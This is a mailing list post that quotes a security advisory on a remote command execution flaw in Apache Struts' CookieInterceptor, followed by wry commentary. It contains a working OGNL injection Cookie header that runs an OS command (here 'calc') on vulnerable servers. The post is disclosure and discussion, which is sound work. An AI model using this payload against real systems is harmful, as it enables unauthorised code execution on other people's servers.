Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Apache Struts

From: Dave Aitel <dave () immunityinc com>
Date: Fri, 06 Jan 2012 10:43:17 -0500
Just how bad is that Sec-Consult Apache Struts vulnerability...

(from their advisory)
___

2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

Given struts.xml is configured to handle all cookie names (independent
of limited cookie values):
        <action name="Test" class="example.Test">
                <interceptor-ref name="cookie">
                        <param name="cookiesName">*</param>
                        <param name="cookiesValue">1,2</param>
                </interceptor-ref>
                <result ...>
        </action>

The following HTTP header will execute an OS command when sent to
Test.action:
        Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1;
        x[@java.lang.Runtime@getRuntime().exec('calc')]=1

___

I assume Struts is extremely widely used and everyone is already owned?
Who was it who thought that OGNL was a good idea? Between this and .Net
being completely broken, the only platforms left are Ruby on Rails and
Python's Django! Oh, and PHP! :>

-dave


-- 
INFILTRATE 2012 January 12th-13th in Miami - the world's best offensive information security conference.
www.infiltratecon.com

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Dailydave mailing list
Dailydave () lists immunityinc com
http://lists.immunityinc.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: